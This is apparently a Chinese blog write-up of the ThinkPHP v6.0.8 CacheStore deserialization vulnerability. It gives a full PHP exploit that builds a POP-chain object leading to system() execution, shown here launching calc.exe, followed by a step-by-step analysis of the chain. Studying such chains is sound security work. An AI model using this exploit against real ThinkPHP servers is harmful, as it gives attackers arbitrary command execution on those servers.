当前位置：首页 > news >正文

ThinkPHP v6.0.8 CacheStore 反序列化漏洞

news 2025/12/22 14:02:29

漏洞说明

1. 漏洞原理：ThinkPHP 6.0.8 CacheStore 会触发POP利用链子，造成任意命令执行

2. 组件描述： ThinkPHP是一个免费开源的，快速、简单的面向对象的轻量级PHP开发框架

3. 影响版本：V6.0.8

漏洞复现

1. 环境安装：ThinkPHP6.0正式完整版下载_其他_技术博文_js代码

下载v6.0.8，使用命令php think run即环境起来了

访问127.0.0.1:8000

需要在源代码中加入一个入口

if(isset($_POST['data'])) {@unserialize($_POST['data']);
}
highlight_string(file_get_contents(__FILE__));

利用exp生成payload并打入data入口

<?phpnamespace League\Flysystem\Cached\Storage {abstract class AbstractCache{protected $autosave;public function __construct(){$this->autosave = false;}}
}namespace think\filesystem {use League\Flysystem\Cached\Storage\AbstractCache;use think\cache\driver\File;class CacheStore extends AbstractCache{protected $store;protected $expire;protected $key;public function __construct(){$this->store = new File();$this->expire = 1;$this->key = '1';}}echo urlencode(serialize(new CacheStore()));
}namespace think\cache {use think\model\Pivot;abstract class Driver{protected $options = ['expire' => 0,'cache_subdir' => true,'prefix' => '','path' => '','hash_type' => 'md5','data_compress' => false,'tag_prefix' => 'tag:','serialize' => ['system'],];public function __construct(){$this->options = ['expire' => 0,'cache_subdir' => true,'prefix' => '','path' => new Pivot(),'hash_type' => 'md5','data_compress' => false,'tag_prefix' => 'tag:','serialize' => ['system'],];}}
}namespace think\cache\driver {use think\cache\Driver;class File extends Driver{}
}namespace think {use think\model\concern\Attribute;abstract class Model{private $data = [];private $withAttr = [];public function __construct(){$this->data = ['errorr0' => 'calc.exe'];$this->visible = ["errorr0" => 1];$this->withAttr = ['errorr0' => 'system'];}}
}namespace think\model\concern {trait Attribute{}
}namespace think\model {use think\Model;class Pivot extends Model{}
}

漏洞分析

全局搜索找到CacheStore所在位置src/think/filesystem/CacheStore.php

找到它的父类AbstractCache，查看发现有__destruct()

步入save查看

跟进查看getForStorage()

没有发现可利用点，步出看save后面的

$this->store->set($this->key, $contents, $this->expire);

这里$this->store是可控的，所以可以调用任意含义set()函数的对象，这里调用src/think/cache/driver/File.php::set

跟进getExpireTime()，查看如下

没有可利用点，步出继续往下步入getCacheKey()查看

前面使用了hash()函数，第一个为hash类型的设置，如果为空或者设置有误则会报错，我们需要保证上面不截断的前提下执行下面return的步骤，return中$this->options['path']与$name进行了拼接，而$this->options['path']是可控的，如果实例化一个有__toString()魔术方法的对象，保证$name不报错，则可以搭成一个链，经过查找发现vendor\topthink\think-orm\src\model\concern\Conversion有__toString可以利用

步入toArray()查看情况

这里看到如果满足条件判断则可以执行getAttr()，步入查看

不出错就应该进入getData()

没什么特别的直接，看外层的getValue()

这里可以构造一个自定义函数以及利用data传参达到任意命令执行，而有个问题就是触发了漏洞怎么将他们链接起来？并且还有一个问题就是恶意payload如何传入，这里经过审计发现需要传入的恶意$data参数是vendor\topthink\think-orm\src\model\concern\Attribute中，而在vendor\topthink\think-orm\src\Model可控制$data，并且

Model复用了Conversion的内容，这样也可以触发__toString，最后构造就按照分析的将几个类复用再给几个类中特殊需要赋值即可，还有一个小问题就是如上图，Model是抽象类，因此我们需要自己手写一个子类继承即可。

Referer

tp6.0.8反序列化漏洞分析 - 网安

thinkphp6.0x反序列化复现及再挖掘-安全客 - 安全资讯平台

ThinkPHP v6.0.8 CacheStore 反序列化漏洞

漏洞说明

漏洞复现

漏洞分析

Referer

相关文章：

ThinkPHP v6.0.8 CacheStore 反序列化漏洞

Spring 事务详解（注解方式）

华为云waf 使用场景

?.的写法后缀修饰符

org.apache.hadoop.hive.ql.exec.DDLTask. show Locks LockManager not specified解决

Adaptive autosar 都有哪些模块？各有什么功能？

C++ 动态内存分配

设计模式——面向对象的7大设计原则

智慧防汛，数字科技的力量

“中国软件杯”飞桨赛道晋级决赛现场名单公布

JDBC处理批量数据提高效率

使用css和js给按钮添加微交互的几种方式

react面试之context的value变化时，内部所有子组件是否变化

使用okHttp不走代理问题

python moviepy 自动化音视频处理实践

聊聊混合动力汽车和纯电骑车的优势和劣势

算法训练Day39|62.不同路径 ● 63. 不同路径 II

react中hooks分享

LeetCode1207. 独一无二的出现次数

【maven】构建项目前clean和不clean的区别

pam_env.so模块配置解析

【单片机期末】单片机系统设计

ardupilot 开发环境eclipse 中import 缺少C++

NXP S32K146 T-Box 携手 SD NAND（贴片式TF卡）：驱动汽车智能革新的黄金组合

在 Spring Boot 中使用 JSP

React从基础入门到高级实战：React 实战项目 - 项目五：微前端与模块化架构

基于单片机的宠物屋智能系统设计与实现（论文+源码）

Win系统权限提升篇UAC绕过DLL劫持未引号路径可控服务全检项目

CVE-2023-25194源码分析与漏洞复现(Kafka JNDI注入)

Docker、Wsl 打包迁移环境